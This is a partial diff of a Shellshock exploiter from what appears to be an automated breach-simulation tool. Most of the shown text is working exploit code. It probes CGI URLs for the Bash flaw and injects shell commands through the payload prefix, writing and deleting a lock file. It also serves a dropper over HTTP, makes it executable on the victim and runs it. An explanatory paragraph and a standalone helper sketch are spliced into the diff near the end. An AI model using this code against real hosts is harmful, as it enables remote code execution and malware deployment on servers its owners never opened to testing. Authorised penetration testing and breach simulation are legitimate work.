from infection_monkey.exploit.tools.http_tools import HTTPTools
from infection_monkey.telemetry.attack.t1222_telem import T1222Telem
__author__ = 'danielg'
@ -18,6 +20,7 @@ LOG = logging.getLogger(__name__)
TIMEOUT = 2
TEST_COMMAND = '/bin/uname -a'
DOWNLOAD_TIMEOUT = 300 # copied from rdpgrinder
LOCK_HELPER_FILE = '/tmp/monkey_shellshock'
class ShellShockExploiter(HostExploiter):
@ -26,6 +29,7 @@ class ShellShockExploiter(HostExploiter):
}
_TARGET_OS_TYPE = ['linux']
_EXPLOITED_SERVICE = 'Bash'
def __init__(self, host):
super(ShellShockExploiter, self).__init__(host)
@ -35,7 +39,7 @@ class ShellShockExploiter(HostExploiter):
) for _ in range(20))
self.skip_exist = self._config.skip_exploit_if_file_exist
def exploit_host(self):
def _exploit_host(self):
# start by picking ports
candidate_services = {
service: self.host.services[service] for service in self.host.services if
@ -65,7 +69,7 @@ class ShellShockExploiter(HostExploiter):
exploitable_urls = [url for url in exploitable_urls if url[0] is True]
# we want to report all vulnerable URLs even if we didn't succeed
self._exploit_info['vulnerable_urls'] = [url[1] for url in exploitable_urls]
self.exploit_info['vulnerable_urls'] = [url[1] for url in exploitable_urls]
# now try URLs until we install something on victim
for _, url, header, exploit in exploitable_urls:
@ -105,6 +109,10 @@ class ShellShockExploiter(HostExploiter):
LOG.info("Can't find suitable monkey executable for host %r", self.host)
return False
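# A lock file on the victim keeps two monkeys from running the Shellshock exploit against the same host at once.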
if not self._create_lock_file(exploit, url, header):
LOG.info("Another monkey is running shellshock exploit")
return True
http_path, http_thread = HTTPTools.create_transfer(self.host, src_path)
if not http_path:
@ -121,6 +129,8 @@ class ShellShockExploiter(HostExploiter):
http_thread.join(DOWNLOAD_TIMEOUT)
http_thread.stop()
self._remove_lock_file(exploit, url, header)
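# Success requires exactly one download and an ELF header at the dropper's target path on the victim.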
if (http_thread.downloads != 1) or (
'ELF' not in self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)):
LOG.debug("Exploiter %s failed, http download failed." % self.__class__.__name__)
@ -130,6 +140,7 @@ class ShellShockExploiter(HostExploiter):
chmod = '/bin/chmod +x %s' % dropper_target_path_linux
run_path = exploit + chmod
self.attack_page(url, header, run_path)
T1222Telem(ScanStatus.USED, chmod, self.host).send()
# run the monkey
cmdline = "%s %s" % (dropper_target_path_linux, DROPPER_ARG)
@ -143,7 +154,7 @@ class ShellShockExploiter(HostExploiter):
if not (self.check_remote_file_exists(url, header, exploit, self._config.monkey_log_path_linux)):
LOG.info("Log file does not exist, monkey might not have run")
continue
self.add_executed_cmd(cmdline)
return True
return False
@ -178,6 +189,17 @@ class ShellShockExploiter(HostExploiter):
LOG.debug("URL %s does not seem to be vulnerable with %s header" % (url, header))
return False,
def _create_lock_file(self, exploit, url, header):
if self.check_remote_file_exists(url, header, exploit, LOCK_HELPER_FILE):
return False
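# 'exploit' is the Shellshock payload prefix; appending a shell command makes the vulnerable CGI create the marker file.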
cmd = exploit + 'echo AAAA > %s' % LOCK_HELPER_FILE
self.attack_page(url, header, cmd)
return True
def _remove_lock_file(self, exploit, url, header):
cmd = exploit + 'rm %s' % LOCK_HELPER_FILE
self.attack_page(url, header, cmd)
@staticmethod
def attack_page(url, header, attack):
result = ""
@ -202,8 +224,17 @@ class ShellShockExploiter(HostExploiter):
if is_https:
attack_path = 'https://'
attack_path = attack_path + str(host) + ":" + str(port)
reqs = []
timeout = False
attack_urls = [attack_path + url for url in url_list]
reqs = [requests.head(u, verify=False, timeout=TIMEOUT) for u in attack_urls]
for u in attack_urls:
try:
reqs.append(requests.head(u, verify=False, timeout=TIMEOUT))
except requests.Timeout:
timeout = True
break
if timeout:
LOG.debug("Some connections timed out while sending request to potentially vulnerable urls.")
valid_resps = [req for req in reqs if req and req.status_code == requests.codes.ok]
urls = [resp.url for resp in valid_resps]
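The rewritten loop above replaces a single list comprehension of HEAD requests with per-URL exception handling, so one hanging server cannot stall the whole scan. A standalone sketch of the same pattern, using the real requests API but a hypothetical probe_urls helper:

import logging

import requests

LOG = logging.getLogger(__name__)
TIMEOUT = 2


def probe_urls(base, paths):
    """HEAD-request each candidate path; stop at the first timeout and
    keep only the URLs that answered 200 OK."""
    responses = []
    for path in paths:
        url = base + path
        try:
            responses.append(requests.head(url, verify=False, timeout=TIMEOUT))
        except requests.Timeout:
            LOG.debug("Timed out probing %s; skipping the remaining paths.", url)
            break
    return [resp.url for resp in responses if resp.status_code == requests.codes.ok]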

Some files were not shown because too many files have changed in this diff.